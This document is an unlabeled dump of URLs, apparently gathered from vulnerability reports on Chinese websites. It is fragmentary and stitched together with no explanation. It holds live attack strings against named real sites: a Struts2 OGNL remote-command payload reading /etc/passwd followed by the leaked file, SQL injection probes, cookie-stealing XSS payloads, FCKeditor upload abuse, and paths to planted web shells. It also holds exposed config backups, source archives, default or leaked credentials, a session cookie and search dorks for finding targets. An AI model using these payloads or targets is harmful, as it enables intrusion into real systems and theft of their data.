http://trip.cmbchina.com/mgm/mgm/rankview_getRuleInfo.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23test%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23test.println%28%23d%29,%23test.close%28%29 http://city2010.house.sina.com.cn/vote.php?jsonp=?&callback=?&gid= http://city2010.house.sina.com.cn/52shanghai/comment.php?fid=6&sign=10000170&city= https://dynamic.12306.cn/otsweb/sysuser/userCenterAction.do?method=initForChangePwd) http://bbs.ccidnet.com/admin.php http://blog.ccidnet.com/admin.php http://bbs.uc.cn http://bbs.uc.cn/config/config_global.php.bak http://bbs.uc.cn/uc_server/data/config.inc.php.bak http://help.vancl.com/Content/780.html http://222.247.56.29/index.php?app=activity&function=show&id=1&sign_key=a0471ceae9553bab758819e7a84c47f2&cid=1 com:6060 
http://appcenter.oa.vipshop.com:6060 http://120.31.133.202/ http://61.142.208.206:8081/ http://www.bchedu.net/Article_Print.asp?ArticleID=834 http://pay.uctest2.ucweb.com:8039/role.jsp http://www.bokesoft.com/ http://www.thinkphp.cn/topic/delete/id/123456.html[/img http://www.thinkphp.cn/extend/482.html http://live.yy.com/index.php?m=Live&type=beauty http://live.yy.com/index.php?m=Activity&do=queryAidsByUser&from=act http://400.xdf.cn/ http://115.182.21.15/ http://www.wkzol.com/www.wkzol.com.rar www.meizhi.cn/UserCenter/image/aid/442 www.meizhi.cn/UserCenter/image?aid=442 http://www.legendcapital.com.cn/Admin/fckeditor/editor/filemanager/connectors/test.html http://www.legendcapital.com.cn/uploadfile/image/ok.asp/111555469.jpg http://www.legendcapital.com.cn/legendcapital.rar http://www.dltour.gov.cn/ http://124.93.228.111:8080/ bt:/pentest/database/sqlmap# http://www.meizhi.cn/Index/showIndustry http://www.hljxm.gov.cn:8002/new/UserFiles/Image/2.jsp http://xxgk.zzszq.gov.cn/www/view/gkzzbak.jsp http://xzfw.wuhai.gov.cn/board/bbs_lista.jsp http://xzfw.xjbz.gov.cn/upimg%5Cinfo%5Ckillbase.jsp http://www.asepb.gov.cn/asep/findGuest http://mail.jsrd.gov.cn:8080/admin/ http://www.nxdw.gov.cn/admin/ http://115.182.21.32/ http://www.jjyyw.gov.cn/admin/login.php bt:/pentest/database/sqlmap# http://www.decfc.dongfang.com/media/media_List.php?NID=1&Language=GB http://gzlps.gov.cn/admin/ http://mail.xys.gov.cn:8080/admin/ http://219.134.88.6/login.aspx http://licaike.hexun.com/List.action licaike.hexun.com/List.action http://m.tom.com/ http://m.tom.com:80/ http://gks.mwr.gov.cn/login.jsp admin:admin http://rsks.mwr.gov.cn/zcxxfw/xxfw/portal/yhzc!login.do http://ptts.iflytek.com/ver.asp http://join.iflytek.com/1.txt http://wooyun.org/bugs/wooyun-2010-034397 file:///c:/fuzz/alert_1.html http://www.oppo.com/?q=interface/getfaq&tag=%25E7%2594%25B5%25E6%25BA%2590%25E7%25B1%25BB http://www.oppo.com/?q=interface/getfaq&tag=%25E7%2594%25B5%25E6%25BA%2590%25E7%25B1%25BB 
http://ny.py.gov.cn/Portals/290/登录网址及用户名密码2012.xls http://123.232.0.241:7001/aims/jsp/public/login.jsp http://view.gdcct.gov.cn:3690/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin http://view.gdcct.gov.cn:3690/wcm/WCMV6/main.jsp http://www.jingmen.gov.cn/ftp/install.php http://cg.ifeng.com http://cg.ifeng.com:80/ http://my.51job.com/51club/coupon/trace.php?tag=wzhan_web_iphone_242_appstore&u=aHR0cHM6Ly9pdHVuZXMuYXBwbGUuY29tL2NuL2FwcC9pZDQxNTQ0MzY0ND9tdD04 https://itunes.apple.com/cn/app/id415443644?mt=8 http://www.crfeb5.com.cn/admin/index.php http://www.wanyan.com/vote/vote!toSingleVote.dhtml http://product.dangdang.com/23344491.html http://www.51point.com/51point2/survey/survey-new!init.action http://202.96.27.18/index.php http://www.bztdxxl.com/qysd/albums.php?sort_id=12 http://114.242.152.122:8080/ http://114.242.152.122/scada/resource/public/handler/jl2.jsp http://bbs.mumayi.com http://bbs.mumayi.com/config/config_global.php.bak http://bbs.mumayi.com/{domain_name}phpmyadmin/ http://www.foxitsoftware.cn/ http://edu.cztv.com/elearning/project/front/getFreeProject.action http://edu.cztv.com/elearning/1.txt http://passport.189.cn/i/ http://tclcom.tcl.com/ http://tclcom.tcl.com/admin http://tclcom.tcl.com/admin/documents/upload/ http://order.qy.tom.com:8080/index.html http://order.qy.tom.com:8080/phpinfo.php http://f.game.tom.com/yxdt/2013/532/index.php http://jc.gdsx.gov.cn/website/supervise/superviseSiteAction.action http://bbs.pigai.org/t84469-1-1.html http://mail.zto.cn/register.php http://www.sxxwcb.gov.cn/sxxwcbadmin/index.php http://www.sxxwcb.gov.cn/404.php http://www.189store.com/index.php?app=myapp&act=collection&type=app&uid=207643763 http://member.chinaacc.com/common/selectphoneForwww.shtm?name= http://www.91zhuji.cn/ http://www.91zhuji.cn/page/products/?'9.html http://z.yy.com/zone/message.do http://www.cd-procurement.gov.cn/zfcgsite/Secondary/BulletinInfo.aspx?nav_id=01010000&id=-44 http://115.182.51.234:8080/ 
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin puppet:x:500:500::/etc/puppet/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin lele:x:0:0:lele:/home/lele:/bin/bash zabbix:x:502:502:zabbix:/usr/local/zabbix:/bin/bash wiky:x:503:503::/letv/wiky:/bin/bash hadoop:x:504:504::/home/hadoop:/bin/bash jenkins:x:498:498:Jenkins server:/var/lib/jenkins:/bin/false http://gz.ip66.com/ http://www.dhqn.gov.cn/admin/index.asp http://www.dhqn.gov.cn/admin/jc_editor/Flash.html http://www.dhdj.com.cn/manage/TC_User/TC_User_add.aspx http://124.126.42.8/ http://dd.gzuni.com/login.action IP:192.168.0.124 port:1521 http://115.85.254.196/FCKeditor/editor/filemanager/upload/test.html http://115.85.254.196/UserFiles/1.asp;1.gif 
http://iwatchome.tom.com/ http://nokia-imaging.tom.com.cn http://nokia-imaging.tom.com.cn/knowledge_view.jsp?type=2 http://kernel-c.maxthon.cn/www/init.php http://build.maxthon.com/ http://partner.maxthon.com/login.action http://partner.maxthon.com/help.jsp http://qiaodan.tom.com http://qiaodan.tom.com/index.php/activity/uploadpage http://bd.generali-china.cn/jmx-console/ http://km.ip66.com/ http://km.ip66.com/3gs.php?id=3 root:0d6a23d72da9fac9 bt:/pentest/database/sqlmap# http://www.foxitsoftware.cn/cms/index.php?ac=login http://bbs.lvmama.com http://bbs.lvmama.com/config/config_global.php.bak http://home.ithaier.com/Tech/chgpwd.asp http://prepaidcard.yeepay.com/kyp/queryMobileTopupResult.action?redirect http://www.crec.com.cn/read.asp?id=1594 http://www.crec.com.cn/news/list.asp?unid=1178 http://www.masrcb.com/masrcb.rar www.hl-n-tax.gov.cn http://www.cscl.com.cn/address.asp?id=31 http://119.254.72.250/ http://119.254.72.250/download/attachment/W5mbj-WGLv5gWZzNSb-W/ http://119.254.72.250/download/attachment/W5mbj-WGLv5gWZzNSb-W/WlAWGe-Wbq-W/S5004792.JPG http://www.lndca.gov.cn/plugins/1/AspxSpy.aspx http://www.lndca.gov.cn/plugins/ cs.beta.ulechina.tom.com/csadmin/csadminFilterurls/query_req.do http://www.tomgroup.com/sql/ http://nokia-imaging.tom.com.cn/manage/index.jsp http://www.tophr.net/news/newslist.asp?id=23%20and%201=1 http://www.tophr.net/news/newslist.asp?id=23%20and%201=2 http://www.lc.gov.cn/web.rar http://www.19lou.com/forum-464781-thread-10241383887082785-1-1.html http://haodian.19lou.com/searchshoplist/0/1/1/1/dfdf%22onmouseover=%22alert%28document.cookie%29/1/1 http://www.jlsfj.gov.cn/ http://game.jinti.com/gameserverlist http://store.kingdee.com/bbs/forum.php?mod=forumdisplay&fid=2&tag_set_id=187&tag_id=1002 http://store.kingdee.com/bbs/forum.php?mod=forumdisplay&fid=2&tag_set_id=187&tag_id=1002 http://store.kingdee.com/bbs/forum.php?mod=forumdisplay&fid=2&tag_set_id=187&tag_id=1002 http://www.grad-bac.cn/news.php?id=665 http://www.wxrkw.gov.cn/ 
http://ics.365car.com.cn/server-status http://ics.365car.com.cn/WEB-INF/web.xml http://211.151.55.40/web4s/indexAction/index_returnIdexPage.action http://it.homeinns.com/homeinnsupload/CompanyCard/CardView.aspx http://gx.lss.gov.cn/ps-cms/counter/new_addArticleClicked.jsp?item_id=14334 http://125.88.6.173/main/UserManager-esmsLogin.action http://125.88.6.173/voluntary/voluntaryReportQuery.action app.m.letv.com/android/inde http://www.guoku.com/entity/note/update/299094/ http://p.zj189.cn/pepsi/web/index.jsp http://p.zj189.cn/pepsi/web/info2.jsp?coupon=2&PrizeID=兑换码 http://p.zj189.cn/pepsi/lr/submitaward.action可以查看所有兑换100M流量的童鞋。。。。。 http://www.hblsj.gov.cn/InfoPublish/CategoryViewNormal.aspx?child=210&parent=209 http://www.v5shop.com.cn/dama.asp http://wap.jinti.com/fangchan/index.aspx http://wap.jinti.com/fangchan/wap_list_selloffice.aspx http://www.paidai.com/user/register.php?act=ok&uid=649925 http://uc.nearme.com.cn/usercenter/resetPassword.do URL:http://uc.nearme.com.cn/usercenter/resetPassword.do Method:POST Code:200 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding:gzip,deflate,sdch Accept-Language:en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4 Connection:keep-alive Content-Type:application/x-www-form-urlencoded Cookie:JSESSIONID=aaay1gJXnU7768sxcR6iu Host:uc.nearme.com.cn Origin:http://uc.nearme.com.cn Referer:http://uc.nearme.com.cn/usercenter/resetPassword.do http://mga.people.com.cn/ http://mga.people.com.cn:80/ http://www.lxcourt.gov.cn/phpmyadmin http://www.lxcourt.gov.cn/phpinfo.php http://tuangouguanli.kaixin001.com/ http://hzclub.vanke.com http://hzclub.vanke.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp http://hzclub.vanke.com/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ http://www.hhly.gov.cn/Admin/login.php http://58.83.219.80/ 
http://travel.haier.com:80/travel/manager/ReLogin.aspx http://外网网址/general/ http://外网网址/pda/ http://115.182.21.15/ http://adobecu.com/Index/Default.aspx http://adobecu.com/news/default.aspx?Class=2&Page=4 http://x.tom.com/ data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4 http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4 http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4 http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4%20and%20length%28database%28%29%29=5 http://usermz.5see.com/cmd.aspx http://vote.sports.tom.com http://vote.sports.tom.com/votecode/%3f.jsp http://vote.sports.tom.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://vote.sports.tom.com/.viminfo http://vote.sports.tom.com/.bash_history http://edu.mohurd.gov.cn http://cnzz.tom.com/store/product/storeProductSearch.do?actionType=list&storeId=1111110028 http://cnzz.tom.com/store/product/storeProductSearch.do?actionType=list&storeId=1111110028 http://cnzz.tom.com/store/product/storeProductSearch.do?actionType=list&storeId=1111110028 http://www.10010js.com/wdzh/zhmm/findPassword.shtml http://xsgl.wtu.edu.cn/epstar/login/index.jsp http://58.83.219.72/ http://bbs.weiqi.tom.com http://dgbest.tom.com/application.php http://123.127.246.26:8080/login.action http://ts12345.tangshan.gov.cn/dcms/bmsAdmin/Admin-logon.action http://116.228.44.6:8080/jybz/logon.action http://42.96.149.244/ http://weiyena.travel.tom.com/admin.php http://61.136.205.112/index_index.action http://114.247.187.140/index.action http://221.7.213.242/ http://121.15.139.141/ http://183.232.70.29:8080/user!userLogin.action http://59.173.236.229/web/index!index.action http://club.jinti.com/admin/admin_CaiJiSaleManage.asp?DepClassid=1 
http://sale.jinti.com/admin/admin_CaiJiSaleManage.asp?DepClassid=1 http://pcab.nlc.gov.cn/ http://61.136.205.112/index_index.action http://battery.tcl.com/read_news.php?id=27 http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://aobo.tcl.com/leftabout.asp?id=3 http://callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 http://cip.tongfangpc.com.cn/cipweb/base/store!input.action http://v.vnet.mobi/portal/wap/home/index.jsp?fr=v_uc http://www.tongjiang.gov.cn/admincp.php http://218.106.133.136/login.aspx http://218.106.133.140/ekp/login.jsp http://a.it168.com http://a.it168.com/config/config_global.php.bak http://a.it168.com/config/config_ucenter.php.bak http://wp.it168.com http://wp.it168.com/config/config_global.php.bak http://wp.it168.com/config/config_ucenter.php.bak http://61.55.167.98 http://61.55.167.98/config/config_global.php.bak http://61.55.167.98/config/config_ucenter.php.bak http://forum.ucweb.com http://forum.ucweb.com/uc_server/data/config.inc.php.bak http://119.254.86.197:5555/index.jsp inurl:goitem.asp?id= site:uc.cn inurl:jsessionid http://meeting.zzedu.net.cn/login.jsp http://webi.tom.com/ http://performance.wanda.cn/index.do http://performance.wanda.cn/type.do?tid=2434581611559502&sid=1474181411546235 http://performance.wanda.cn/type.do?tid=2434581611559502&sid=1474181411546235 http://cfp.fpsbchina.cn/fpscc/ http://218.58.70.209:8080/ http://218.58.70.209:8080/common/selmultiman.jsp http://218.58.70.209:8080/common/selmultiman.jsp http://121.207.254.13/install/cemdb/bdimport.php http://www.hczfgjj.com/console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1384018720305&isNew=false&frameId=wl_console_frame_1384018720306&sidebarFrameId=wl_console_frame_1384018720307&MBean=mydomain%3AName%3Dmydomain%2CType%3DDomain 
http://www.lbszfgjj.org/console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1384026638791&isNew=false&frameId=wl_console_frame_1384026638792&sidebarFrameId=wl_console_frame_1384026638793&MBean=myweb%3AName%3Dmyweb%2CType%3DDomain http://f1.warlord.duowan.cn/ http://bbs.taobao.com/catalog/thread/508895-264831340.htm http://211.139.95.67:8080/login.action default:/usr/local/java/jre/lib/ppc64:/usr/lib http://www.ibm.com/ http://dref.csdl.ac.cn/digiref/ http://www.las.ac.cn/nslservice/Ill/login.jsp http://www.xdwan.com/help/list.aspx?gid=null&key= http://co.rank.91.com/enzf/honour.aspx http://lenovobbs.lenovo.com.cn/forum.php http://go.sohu.com/2013/innovator/uploadvote.php http://bbs.wan.58.com http://www.gszhenyuan.gov.cn/Index.html http://218.106.129.6/logo.asp www.xywy.com site:www.xywy.com http://performance.wanda.cn:80/type.do?tid=968060431-198325&sid=1474181411546235&treenews=2066209175-17633 http://performance.wanda.cn/type.do?tid=968060431-198325&sid=1474181411546235'%20and%20'1'='1&treenews=2066209175-17633 http://performance.wanda.cn/type.do?tid=968060431-198325&sid=1474181411546235'%20and%20'1'='2&treenews=2066209175-17633 http://www.vans-china.cn/LoginUser http://www.haierbid.com http://www.haierbid.com/Desktop/InfoListByClass.aspx?ClassId=11 service.500wan.com/inc/ http://cif.trs.com.cn http://www.dagexing.com/member/member_userCenterSkip.action http://cetv.yule.tom.com/cms/php/ http://www1.gdbnet.cn/index.aspx这应该是广东分站 http://www1.gdbnet.cn/Template/Store/moban_50/ProductDetail.aspx?InfoID=7163134。ps:- http://u.china.com/photo/?_a=showphoto&albumid=21587&pass=&photoid=247416&uid=10392071 http://club.tom.com/present.tar.gz http://club.tom.com/login.php?backurl=%22%3E%3Cscript%3Ealert%28/wooyun.org/%29%3C/script%3E http://58.53.209.102:8080/web/hsy_index.aspx http://58.53.209.102:8080/admin/login.aspx http://adpm.cbex.com.cn//mon/uct/core/my-pwd.action http://www.csrc.ac.cn:8280//meeting/meeting/userLogin.action http://222.246.131.141/ 
http://www.decfc.dongfang.com/bulletin/bulletin_List.php?ID=3 http://cs.cfca.com.cn/cgi-bin/CertQuery!input.action http://cq.sina.com.cn/t.html?url=http://weibo.com/2128914281/AhFTECmy6 http://www.cqta.gov.cn/cquinfo/List.aspx?id=80 http://housing.jinti.com/chizhou-zufang/d20441427.htm http://corevms.ppstream.com/登录页面 http://www.jyqts.gov.cn/web.rar http://124.127.49.68:83/total.asp http://124.127.49.68:83/excel/ http://hi.189.cn/dragon/Tymc_order_detailinfo.jsp?BASICORDERID=8310 http://drops.wooyun.org/papers/58 http://passport.jinti.com/login.aspx http://passport.jinti.com/login.aspx?reurl=http://www.reurl.com,reurl的值就是登陆成功后跳转的地址。 http://zzjyt.haier.net/ZZJYT/login/index.jsp http://zzjyt.haier.net/ZZJYT/login/test.jsp http://zzjyt.haier.net/ZZJYT/login/test.jsp http://zzjyt.haier.net/ZZJYT/login/test.jsp http://sqlmap.org http://zzjyt.haier.net/ZZJYT/login/index.jsp http://wooyun.org/bugs/wooyun-2013-038426 http://mir3.abc.sdo.com/knowledgebase/GetKnowledgeBase http://wap.ccw.com.cn/cmd.php http://www.peoplecity.cn/pmgyggds/index.action http://www.peoplecity.cn/pmgssyds/index.action http://www.tjsafety.gov.cn/Admin/admin_login.aspx http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4 http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4 http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4 http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4%20and%20length%28database%28%29%29=5 http://ideaclub.lenovo.com.cn/forum/,同样可以用这个帐号登录后台 http://ideaclub.lenovo.com.cn/erazer/ http://service.clo.com.cn/Common/EventDtl/Event_Dtl.aspx?EventCode=SJ00040388 http://bbs.paidai.com/topic/197923 http://monitor.maxthon.cn/index.php http://tieba.baidu.com/pmc/recycle http://www.whta.gov.cn/gov/lyml.asp?typer=jq http://www.whsmz.gov.cn/ http://xui.ptlogin2.qq.com/cgi-bin/qlogin www.qq.com 
http://ptlogin2.qq.com/undefined?clientuin=54160134x&clientkey=00015281B6FE00686FAF6D75E76ECC7D6DB2C1BB1CA3D14091C87E306776F04DDE11D6F90600AF9C84AC930D98CB9C86148525D2EA1376442C0B6D43C51BEC5BFBA9685E37D9BD9A192FCF8B70E3498C86314DF5E7D06512E347516BEEFF72A0CB07087F461A701B70FCB567C3E5xxx http://www.mileyx.com http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/11/t.rar http://wd.xygy.gov.cn/install/upgrade.aspx http://wd.xygy.gov.cn/_temp/2/2.asp http://59.61.88.198:8000/ appi.zto.cn/appi/interface.php?style=json&func=news.list&class=1&page=1&size=1&keyword= http://218.6.242.100/Admin/Admin.fhtml http://univ.zte.com.cn:80/ztetrain/login.aspx http://bbs.111g.com/config/config_ucenter.php http://www.sdaj.gov.cn/Portal/page/upload/showfile.asp?id=2967 http://ac.haidilao.com/ http://ac.haidilao.com/WebServices/WebServiceSSOUser.asmx http://netspnew.cdgh.gov.cn/ http://netspnew.cdgh.gov.cn/UserApply.aspx?type=5 http://shenbao.gzwater.gov.cn/ http://shenbao.gzwater.gov.cn/jhysDataManage/loginAction!login.action http://www.qqhrfgj.gov.cn/js/xxxh/?F1673D7A7CE8D3AC http://tita.qq.com/bbs http://tita.qq.com/bbs/config/config_global.php.bak http://tita.qq.com/bbs/config/config_ucenter.php.bak http://pay.game.test.pps.tv/gamepay/game_pay_main/index?g_id=281d&tid=5601&server_type=0 http://pay.game.test.pps.tv/gamepay/game_pay_main/index?g_id=281d&tid=5601&server_type=0 http://support.zte.com.cn http://support.zte.com.cn/admin/ http://biz.finance.sina.com.cn/fund/fund_page/cmp_img_jz.php?fund_code=000011&ccode1=&ccode2=000001&putday=5&1335363286033 http://gwact.woniu.com/9yin/h111224/admin?end_time=&server=&start_time=&state=&user= http://61.155.50.147/login.aspx http://61.155.50.147/fckeditor/editor/filemanager/connectors/test.html http://61.155.50.147/files/file/asp.asp/asp.jpg http://www.crmg-lz.com/struct.asp?classid=2 https://www.ciqgs.com:6889/HG/ https://www.ciqgs.com:6889/admin/protected/deployer.jsp https://www.ciqgs.com:6889/job/jb.jsp http://210.21.223.45/index.jsp 
http://wap.zto.cn/ http://wap.zto.cn:80/province.aspx?wang=-1 http://www.dooland.com/iptv/article.php?id=174129 error:1064 http://apt.weiphone.com/index.php?action=packageRead&id=27518 https://www.huobi.com/market/huobi.php?a=detail&jsoncallback=jQuery17;%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E2579187126594714_1384327877885&_=1384327878137 http://***.shenzhenair.com/***/ http://zhuhai.kingdee.com/about/index.html http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://mz.5see.com/admin/Default.aspx http://usermz.5see.com/user/head/xiaolou http://zhengzhou.kingdee.com/search/result.html http://ecard.nankai.edu.cn/getfjnr.action?fjid=8ae48a8a254e6f8101254ea07c2d0003 http://ecard.sdu.edu.cn/getfjnr.action?fjid=53d6b6923cff8518013f5f2b4b59000b http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://tvs.tcl.com/main/ShowAsk.aspx?ID=368069 http://123.103.23.24/logon.jsp http://try.fumu.com/ http://rtb.behe.com/ck?adid=886688&orderid=17618&exchgid=99&umode=1&refer=http%3A%2F%2Fmedia.behe.com&landing=http%3A%2F%2Fwww.jiuxian.com%2Fcoop%2Fcpstrack.php%3Fsrc%3Dbihe%26code%3Dbihe1%26url%3Dhttp%3A%2F%2Fwww.jiuxian.com http://jm.behe.com/tools/201311/152.html http://rtb.behe.com/ck?adid=886688&orderid=17619&exchgid=99&umode=1&refer=http%3A%2F%2Fmedia.behe.com&landing=http%3A%2F%2Fwww.jiuxian.com%2Fcoop%2Fcpstrack.php%3Fsrc%3Dbihe%26code%3Dbihe2%26url%3Dhttp%3A%2F%2Fwww.jiuxian.com http://jm.behe.com/tools/201311/153.html http://www.magnotel.com/MemberManage/OrderDetail----CC2010072016540.html 
http://gongdan.www.net.cn/ http://zhuzhou.kingdee.com/pub/list/101201/list2_15.html http://zhongshan.kingdee.com/success-stories/index.html http://www.xunware.com/front/memberfront/memberFront_vipLogin.do http://www.csxks.cn/front/memberfront/memberFront_vipLogin.do http://220.168.55.61/front/memberfront/memberFront_vipLogin.do http://www.hnxj.org/front/memberfront/memberFront_vipLogin.do http://124.117.230.249/front/memberfront/memberFront_vipLogin.do http://jydd.xjedu.gov.cn/front/memberfront/memberFront_vipLogin.do http://dc.xunware.com/front/memberfront/memberFront_vipLogin.do http://xjgk.xjedu.gov.cn/front/memberfront/memberFront_vipLogin.do http://gpjh.xjedu.gov.cn/front/memberfront/memberFront_vipLogin.do http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=1 http://i.appchina.com/wordpress/wp-admin/ http://xss.tw/4108 http://info.tcl.com/ http://218.106.133.140/ekp/login.jsp pay.game.test.pps.tv/gamepay/paygameindex/index pay.game.test.pps.tv/gamepay/paygameindex/index live.pps.tv/index.php/epg/get_channel_list?cat_code=1 live.pps.tv/index.php/epg/get_channel_list?cat_code=1 http://m.jiuxian.com/user/add_bonus http://202.104.120.69/admin/workbench.faces http://223.4.211.13:8088/ www.chrm.gov.cn www.dongping.gov.cn www.cjr.org.cn www.creditcard.com.cn采用dedecms5.7,存在变量覆盖漏洞 http://yxmhero1989.blog.163.com/blog/static/11215795620135811848658/ http://lecture.pku.edu.cn/lecture_more.php?typeid=5 http://live.pps.tv/index.php/epg/get_program_list_by_timezone?cat_code=1 http://live.pps.tv/index.php/epg/get_program_list_by_timezone?cat_code=1 http://223.202.15.179 http://console.app.mykingdee.com/api/login-img.action y.china.com.cn/user http://jckc.gov.cn/ http://218.106.129.8/ http://www.u-loveit.cn/ajax/down.aspx?p=images/bz1.jpg http://www.aigo.com/11.rar http://m.jinti.com/login.aspx http://www.ths.gov.cn/ http://javashop3.javamall.com.cn/admin http://javashop3.javamall.com.cncore/admin/themeFile!list.do?themeid=1&folderName=/../../&type=file 
http://javashop3.javamall.com.cn/editor/ckeditor/11.jsp http://www.hualaisurvey.com/admin/login.html修改成http://www.hualaisurvey.com/admin/admin.aspx http://kt.tcl.com http://124.128.202.20:7001/oryxSDJGWebApp/statistics/scdwxx/qyxxquery.jsp http://blog.sina.com.cn/s/blog_d38c52360101nhu0.html http://d1.sina.com.cn/litong/zhitou/identity.html http://d1.sina.com.cn/litong/zhitou/storage.swf,并且会调用以下代码: line-height:160%;font-size:14px http://www.jilixingdong.org/browser.jsp http://union.500.com/pages/checkuserinfo.php?name=admin&email=xx%40qq.com http://m.7k7k.com/about.html http://monitor.house365.com/index.php http://www.fumu.com/api/js.php http://202.110.133.70/xzspweb/ http://jiandu.happigo.com:8080 http://jiandu.happigo.com:8080/robots.txt%00.php http://guangzhou.baixing.com/qiufang/a290159374.html rates.homeinns.com/Servers/HotelData.ashx?fid=huizhou-0752 http://112.124.3.235:88/zte/ http://wenwen.soso.com/z/q127133864.htm inurl:cms/Column.aspx inurl:cms/Column.aspx?LMID= http://admin.chineseall.cn/index.action http://admin.chineseall.cn/book/listBookSchoolSort.action http://jiasu.qule.com/gif.jsp http://www.jntlj.com/cx_nr.aspx?type=SSXW&id=5674 www.hh010.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://douwan.tudou.com/ http://www.jinti.com/members/ClassInfoManage.asp http://housing.jinti.com/aspx/aspx/Person_my_posts_all.aspx s.cn/1.jpg http://xjd.tcl.com/jxscx.asp http://www.sanjin.com.cn/job/zpxx/JobDetailServlet?id=263 http://www.sanjin.com.cn/job/zpxx/JobDetailServlet?id=263'and'a'='a http://www.sanjin.com.cn/job/zpxx/JobDetailServlet?id=263'and'a'='as http://m.jobui.com/company/10483991/review/ http://post.tom.com/post.tar.gz http://post.tom.com/qa/env.php http://invoice.skype.tom.com index.php/login/signin http://invoice.skype.tom.com:80/ http://www.duomai.com/index.php?m=article&a=artlist 
